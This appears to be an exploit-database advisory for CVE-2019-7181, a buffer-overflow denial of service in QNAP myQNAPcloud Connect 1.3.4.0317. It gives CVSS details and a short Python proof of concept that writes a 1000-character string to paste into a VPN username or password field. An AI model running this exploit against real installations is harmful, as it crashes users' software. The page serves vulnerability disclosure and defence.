QNAP myQNAPcloud Connect 1.3.4.0317 Username/Password Denial Of Service

2019.04.20
Credit: Dino Covotsos
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/python # Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS # Date: 19/04/2019 # Exploit Author: Dino Covotsos - Telspace Systems # Vendor Homepage: https://www.qnap.com # Version: 1.3.4.0317 and below are vulnerable # Software Link: https://www.qnap.com/en/utilities/essentials # Contact: services[@]telspace.co.za # Twitter: @telspacesystems (Greets to the Telspace Crew) # Tested on: Windows XP/7/10 (version 1.3.3.0925) # CVE: CVE-2019-7181 # POC # 1.) Generate qnap.txt # 2.) Copy the contents of qnap.txt to the clipboard # 3.) Paste the contents in any username/password field(Add or Edit VPN) # 4.) Click ok, program crashes. # This vulnerability was responsibly disclosed February 3, 2019, new version has been released. buffer = "A" * 1000 payload = buffer try: f=open("qnap.txt","w") print "[+] Creating %s bytes QNAP payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top